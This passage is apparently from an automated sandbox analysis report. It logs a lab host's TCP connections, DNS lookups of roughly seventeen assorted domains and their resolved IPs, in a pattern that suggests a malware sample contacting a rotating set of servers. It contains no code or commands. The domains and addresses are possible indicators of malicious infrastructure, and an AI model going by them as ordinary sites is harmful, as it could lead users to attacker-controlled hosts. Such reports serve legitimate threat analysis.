                                                                          Jan 30, 2023 13:41:33.633543968 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.633568048 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.633589029 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.633621931 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.745325089 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745363951 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745385885 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745408058 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745423079 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745436907 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745459080 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745480061 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745501041 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745522022 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745543003 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745564938 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745585918 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745608091 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745620966 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.745630980 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745654106 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745676041 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745697975 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745719910 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745742083 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.745768070 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.745836973 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857472897 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857507944 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857527971 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857547998 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857573032 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857594013 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857615948 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857636929 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857660055 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857680082 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857701063 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857722044 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857743979 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857764006 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857799053 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857820034 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857837915 CET804973064.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:33.857848883 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857848883 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857848883 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857848883 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857848883 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:33.857949972 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:34.335650921 CET4973080192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:35.352133989 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:35.464098930 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:35.464303970 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:35.464464903 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:35.576263905 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.265957117 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.265997887 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266017914 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266037941 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266062021 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266083002 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266108036 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266134024 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266161919 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266165972 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266165972 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266191006 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.266208887 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.266239882 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378217936 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378253937 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378272057 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378290892 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378310919 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378335953 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378355026 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378361940 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378391027 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378393888 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378393888 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378413916 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378434896 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378454924 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378457069 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378473997 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378494024 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378506899 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378525972 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378550053 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378570080 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378576994 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378597021 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378618002 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378638983 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.378676891 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.378709078 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490629911 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490753889 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490816116 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490844011 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490863085 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490916014 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.490931988 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.490966082 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491017103 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491045952 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491118908 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491168022 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491172075 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491236925 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491300106 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491311073 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491405010 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491457939 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491503000 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491554976 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491602898 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491617918 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491652012 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491693974 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:36.491704941 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.491899967 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.492281914 CET4973180192.168.2.564.34.68.10
                                                                          Jan 30, 2023 13:41:36.604203939 CET804973164.34.68.10192.168.2.5
                                                                          Jan 30, 2023 13:41:46.574623108 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.597848892 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.598038912 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.598280907 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:46.621326923 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629065037 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629133940 CET8049732217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:46.629221916 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:48.102818966 CET4973280192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.168648958 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.191988945 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.192121029 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.192296982 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.215440035 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222229958 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222260952 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222280025 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:49.222443104 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.222493887 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.222708941 CET4973480192.168.2.5217.160.0.94
                                                                          Jan 30, 2023 13:41:49.245848894 CET8049734217.160.0.94192.168.2.5
                                                                          Jan 30, 2023 13:41:54.345222950 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.457226992 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.457503080 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.457782984 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:54.568217039 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568286896 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568422079 CET804973567.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:54.568550110 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:55.962604046 CET4973580192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:56.978915930 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.088537931 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.088923931 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.089145899 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.198584080 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.198988914 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.199032068 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:41:57.199181080 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.199347973 CET4973680192.168.2.567.215.9.138
                                                                          Jan 30, 2023 13:41:57.308691025 CET804973667.215.9.138192.168.2.5
                                                                          Jan 30, 2023 13:42:07.296283007 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.322555065 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.322695971 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.322936058 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:07.349845886 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.349878073 CET8049737185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:07.350083113 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:08.838682890 CET4973780192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.854974031 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.881261110 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.881423950 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.881613970 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.908283949 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.908348083 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:09.908580065 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.908778906 CET4973880192.168.2.5185.104.28.238
                                                                          Jan 30, 2023 13:42:09.935323954 CET8049738185.104.28.238192.168.2.5
                                                                          Jan 30, 2023 13:42:14.945475101 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:14.976012945 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:14.976214886 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:14.977011919 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:15.008919001 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295717955 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295805931 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295852900 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.295995951 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:15.296072960 CET8049739172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:15.296471119 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:16.479938984 CET4973980192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.496393919 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.527112961 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.527288914 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.527848005 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.558413029 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.854996920 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855050087 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855070114 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855087042 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:17.855324984 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.862265110 CET4974080192.168.2.5172.67.179.191
                                                                          Jan 30, 2023 13:42:17.893002987 CET8049740172.67.179.191192.168.2.5
                                                                          Jan 30, 2023 13:42:23.068209887 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.133913994 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.134094954 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.134269953 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:23.199517012 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248631001 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248666048 CET804974187.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:23.248795033 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:24.636953115 CET4974180192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.652991056 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.722660065 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.722958088 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.723154068 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.794202089 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803071976 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803139925 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:25.803452015 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.803721905 CET4974280192.168.2.587.236.16.153
                                                                          Jan 30, 2023 13:42:25.873691082 CET804974287.236.16.153192.168.2.5
                                                                          Jan 30, 2023 13:42:31.825979948 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.091356039 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.091521978 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.091612101 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.356904984 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.356997013 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.357069969 CET804974314.128.47.126192.168.2.5
                                                                          Jan 30, 2023 13:42:32.357290983 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.358773947 CET4974380192.168.2.514.128.47.126
                                                                          Jan 30, 2023 13:42:32.623991966 CET804974314.128.47.126192.168.2.5

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 30, 2023 13:39:16.577627897 CET4917753192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:39:16.597515106 CET53491778.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:39:49.971883059 CET5148453192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:39:49.991219044 CET53514848.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:00.592302084 CET5675153192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:00.652975082 CET53567518.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:08.383594990 CET5503953192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:08.573815107 CET53550398.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:18.820596933 CET5922053192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:18.930113077 CET53592208.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:29.342073917 CET5506853192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:29.647676945 CET53550688.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:46.492300034 CET5853253192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:46.681231022 CET53585328.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:40:57.688534975 CET6265953192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:40:57.713171005 CET53626598.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:05.404052973 CET5858153192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:05.424666882 CET53585818.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:14.151660919 CET6551353192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:14.185730934 CET53655138.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:23.560465097 CET5668753192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:23.671066046 CET53566878.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:32.577380896 CET6441953192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:32.708061934 CET53644198.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:46.541214943 CET5268853192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:46.566090107 CET53526888.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:41:54.232404947 CET5397253192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:41:54.342660904 CET53539728.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:42:07.273339033 CET6493253192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:42:07.295037985 CET53649328.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:42:14.920506001 CET5847253192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:42:14.943119049 CET53584728.8.8.8192.168.2.5
                                                                          Jan 30, 2023 13:42:22.902528048 CET6017753192.168.2.58.8.8.8
                                                                          Jan 30, 2023 13:42:23.067003965 CET53601778.8.8.8192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 30, 2023 13:39:16.577627897 CET192.168.2.58.8.8.80x7dc4Standard query (0)hirosguide.huA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:39:49.971883059 CET192.168.2.58.8.8.80xe983Standard query (0)www.panalobet88.netA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:00.592302084 CET192.168.2.58.8.8.80x222dStandard query (0)www.toporsche.onlineA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:08.383594990 CET192.168.2.58.8.8.80x4d40Standard query (0)www.chimid.orgA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:18.820596933 CET192.168.2.58.8.8.80xabe8Standard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:29.342073917 CET192.168.2.58.8.8.80xc0e1Standard query (0)www.44yyds.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:46.492300034 CET192.168.2.58.8.8.80x7e39Standard query (0)www.yeah-go.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:57.688534975 CET192.168.2.58.8.8.80xe8c3Standard query (0)www.frogair.onlineA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:05.404052973 CET192.168.2.58.8.8.80x2a61Standard query (0)www.deglaz.xyzA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:14.151660919 CET192.168.2.58.8.8.80x4a57Standard query (0)www.laylaroseuk.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:23.560465097 CET192.168.2.58.8.8.80x4ef9Standard query (0)www.lakeviewautomation.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:32.577380896 CET192.168.2.58.8.8.80x26dcStandard query (0)www.dellaone.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:46.541214943 CET192.168.2.58.8.8.80x35efStandard query (0)www.arritalvigo.comA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:54.232404947 CET192.168.2.58.8.8.80x7692Standard query (0)www.versusfinances.techA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:07.273339033 CET192.168.2.58.8.8.80x2470Standard query (0)www.hayethe.siteA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:14.920506001 CET192.168.2.58.8.8.80x3ec8Standard query (0)www.octohoki.netA (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:22.902528048 CET192.168.2.58.8.8.80x5af6Standard query (0)www.hougou.ruA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 30, 2023 13:39:16.597515106 CET8.8.8.8192.168.2.50x7dc4No error (0)hirosguide.hu91.227.138.48A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:39:49.991219044 CET8.8.8.8192.168.2.50xe983No error (0)www.panalobet88.netpanalobet88.netCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:39:49.991219044 CET8.8.8.8192.168.2.50xe983No error (0)panalobet88.net14.128.47.126A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:00.652975082 CET8.8.8.8192.168.2.50x222dNo error (0)www.toporsche.online194.58.112.174A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:08.573815107 CET8.8.8.8192.168.2.50x4d40No error (0)www.chimid.org208.91.197.91A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:18.930113077 CET8.8.8.8192.168.2.50xabe8No error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:29.647676945 CET8.8.8.8192.168.2.50xc0e1No error (0)www.44yyds.com44yyds.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:29.647676945 CET8.8.8.8192.168.2.50xc0e1No error (0)44yyds.com137.59.148.248A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:46.681231022 CET8.8.8.8192.168.2.50x7e39No error (0)www.yeah-go.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:46.681231022 CET8.8.8.8192.168.2.50x7e39No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:57.713171005 CET8.8.8.8192.168.2.50xe8c3No error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:40:57.713171005 CET8.8.8.8192.168.2.50xe8c3No error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:05.424666882 CET8.8.8.8192.168.2.50x2a61No error (0)www.deglaz.xyz199.192.28.121A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:14.185730934 CET8.8.8.8192.168.2.50x4a57No error (0)www.laylaroseuk.comlaylaroseuk.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:14.185730934 CET8.8.8.8192.168.2.50x4a57No error (0)laylaroseuk.com2.57.90.16A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:23.671066046 CET8.8.8.8192.168.2.50x4ef9No error (0)www.lakeviewautomation.comlakeviewautomation.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:23.671066046 CET8.8.8.8192.168.2.50x4ef9No error (0)lakeviewautomation.com142.44.131.177A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:32.708061934 CET8.8.8.8192.168.2.50x26dcNo error (0)www.dellaone.comdellaone.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:32.708061934 CET8.8.8.8192.168.2.50x26dcNo error (0)dellaone.com64.34.68.10A (IP address)IN (0x0001)false
